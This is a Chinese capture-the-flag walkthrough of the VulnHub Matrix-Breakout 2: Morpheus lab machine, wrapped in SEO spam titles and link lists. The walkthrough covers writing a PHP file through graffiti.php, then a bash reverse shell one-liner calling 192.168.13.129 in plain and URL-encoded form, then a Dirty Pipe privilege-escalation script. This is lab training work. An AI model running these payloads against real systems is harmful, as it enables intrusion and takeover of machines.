当前位置: 首页 > wzjs >正文

wap 2.0的网站项目管理网络图

wap 2.0的网站,项目管理网络图,电影网站建设需要什么软件,网站模板下载网站靶机下载地址: https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova 1、信息收集 主机发现 arp-scan-l 看看端口详细信息 nmap -A -T4 -p- 192.168.13.145 访问80端口,发现是个带着图片的界面,没有什么可以传参的…

靶机下载地址:
https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
1、信息收集
主机发现 arp-scan-l
在这里插入图片描述
看看端口详细信息 nmap -A -T4 -p- 192.168.13.145
在这里插入图片描述
访问80端口,发现是个带着图片的界面,没有什么可以传参的地方
在这里插入图片描述
2、漏洞发现
查找该网站下的txt,zip,php,html文件
ffuf -u http://192.168.13.145/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
在这里插入图片描述
于是就看到这几个文件:
robots.txt
graffiti.txt
graffiti.php
在这里插入图片描述
发现在graffiti.php的输入框输入内容后会保存到graffiti.txt文件中,先抓个包看看变量名
在这里插入图片描述
此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件
在这里插入图片描述
接下来,准备反弹shell
在这里插入图片描述
访问试试,白屏就是写入成功
在这里插入图片描述
接下来使用蚁剑连接
在这里插入图片描述
cd到根目录发现了一个FLAG.txt
在这里插入图片描述
cat一下查看内容,结尾出现了一个名叫cypher-neo.png的图片。好像让我去获取一个密码。那就去看看这个png
在这里插入图片描述
因为蚁剑的文件不是完整的,可能会有隐藏文件,做个反弹shell双管齐下(一句话需要魔改一下,弄上URL编码,干掉问号和空格和&)

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.13.129/666 0>&1'"); ?>

<%3fphp+exec(“/bin/bash±c+‘bash±i+>%26+/dev/tcp/192.168.13.129/4444+0>%261’”);+%3f>
在这里插入图片描述
访问192.168.13.145/b.php,反弹成功!

在这里插入图片描述
3、提权
查看刚才提示里的图片,在网站上看不有啥,下载下来看看
在这里插入图片描述
wget http://192.168.13.145/.cypher-neo.png
binwalk .cypher-neo.png
binwalk 下面是它的常用参数
-E:用于解码和提取已知的文件类型。
-M:在提取过程中自动尝试解密已知的加密算法。
-e:用于提取文件。
-y:用于自动确定文件系统类型。
-f:用于指定要分析的文件格式。
-l:用于显示已知的签名。
-x:用于提取文件系统。
-d:启用调试模式。
-v:显示详细输出。
-R:递归分析。
在这里插入图片描述
加–run-as=root,之后目录下会多个目录
binwalk -e .cypher-neo.png --run-as=root
在这里插入图片描述
zlib提取不太会,等改天有时间再慢慢看吧
https://www.cnblogs.com/ainsliaea/p/15780903.html
https://blog.csdn.net/qq_40574571/article/details/80164981
从github上找的一个提权脚本
https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/32ca1c6c-01e4-46f3-8ffe-c29d28b8d6a8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240814%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240814T102734Z&X-Amz-Expires=300&X-Amz-Signature=da267aa55d6b221464632e1fcd22046dd324f2ce1cd1953dcb40a66c6a322da0&X-Amz-SignedHeaders=host&actor_id=108580799&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
回到蚁剑,把文件传上来
在这里插入图片描述
cd /var/www/html
chmod +x linpeas.sh
在这里插入图片描述
脚本和内核版本全指向了一个CVE-2022-0847的漏洞
在这里插入图片描述
接下来就找个exploit,下载好了,就通过蚁剑传上去
https://github.com/r1is/CVE-2022-0847/blob/main/Dirty-Pipe.sh
给权限,再运行
chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh
在这里插入图片描述
提权成功,查看flag
cat /root/FLAG.txt
在这里插入图片描述

http://www.dtcms.com/wzjs/783560.html

相关文章:

  • 做网站开票是多少个点的票企业名字查重系统
  • soho没有注册公司 能建一个外贸网站吗semester怎么读
  • 做网站专业公司电话表白网站在线生成免费
  • 网站建设经验材料wordpress按作者归档
  • 在线商城网站怎么做WordPress八图
  • 淮南网站建设报价用vs2010做网站的好处
  • 高清设计网站推荐sem和seo的工作
  • 网站服务器安全配置同城版网站建设
  • 网站建设客户功能详细要求中国字幕组回怼韩国媒体
  • 淘宝网站开发技术名称网站伪静态怎么设置
  • 云南省建设厅建管处网站门户网站建设方案是什么意思
  • 律师在哪个网站做推广比较好wordpress主题图片路径设置
  • 二级造价师邢台网站优化定制
  • 福州优秀网站建设公司莱芜
  • 沛县互助网站开发个人社保缴费基数怎么算
  • 如何查找网站备案邯郸小学网站建设
  • 网站仿制大同网站建设哪里好
  • 做网站要自己租服务器列举网免费发布信息网
  • 电商网站模板html国家住建部官网
  • 漂亮的手机网站模板查看wordpress主题
  • 定制型网站设计学校网站设计图片
  • 濮阳市住房和城乡建设局网站服装设计就业前景如何
  • 自动化科技产品网站建设wordpress首页做全屏
  • 空间设计网站大全那里网站建设好
  • 自己手机怎么免费做网站html制作新闻页面代码
  • 食品 网站源码网站销售流程
  • ps做营销型网站布局百度联盟网站有哪些
  • 免费进入电影网站人人网入口网站建设选择云主机吗
  • 注销主体备案与网站备案wordpress产品相册
  • 国内 响应式网站女孩做网站合适吗